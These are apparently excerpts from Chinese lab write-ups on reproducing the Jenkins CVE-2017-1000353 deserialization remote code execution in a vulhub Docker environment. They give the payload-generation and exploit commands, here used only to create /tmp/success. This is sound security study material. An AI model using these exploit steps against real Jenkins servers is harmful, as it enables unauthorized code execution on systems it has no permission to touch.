项目中遇到Jenkins-CI 远程代码执行漏洞相关漏洞,本地尝试漏洞复现,目前已知可以在/tmp下面创建文件,但是没有内容,基于这个环境尝试其他的方式。 环境搭建 https://github.com/vulhub/vulhub/tree/master/jenk…
所有Jenkins LTS均受到影响(包括<=2.46.1版本) 三、漏洞复现: 下载利用脚本:https://github.com/vulhub/CVE-2017-1000353 1、生成ser二进制利用文件(注意和java版本有关系,我在kali下生成的ser文件可成功利用,在win10的java版本失败了): java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar poc.ser "touch /t...
ifconfig java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" python exploit.py http://ip:8080 jenkins_poc.ser docker exec -it ContainerID /bin/bash cd tmp ls
使用vulhub搭建漏洞环境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/ 0x02 复现 首先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar,这是生成POC的工具。 https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar 执行下面命令,生成字节...
cd vulhub/jenkins/CVE-2017-1000353 启动环境: docker-compose up -d 访问8080端口 二、漏洞描述: Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行。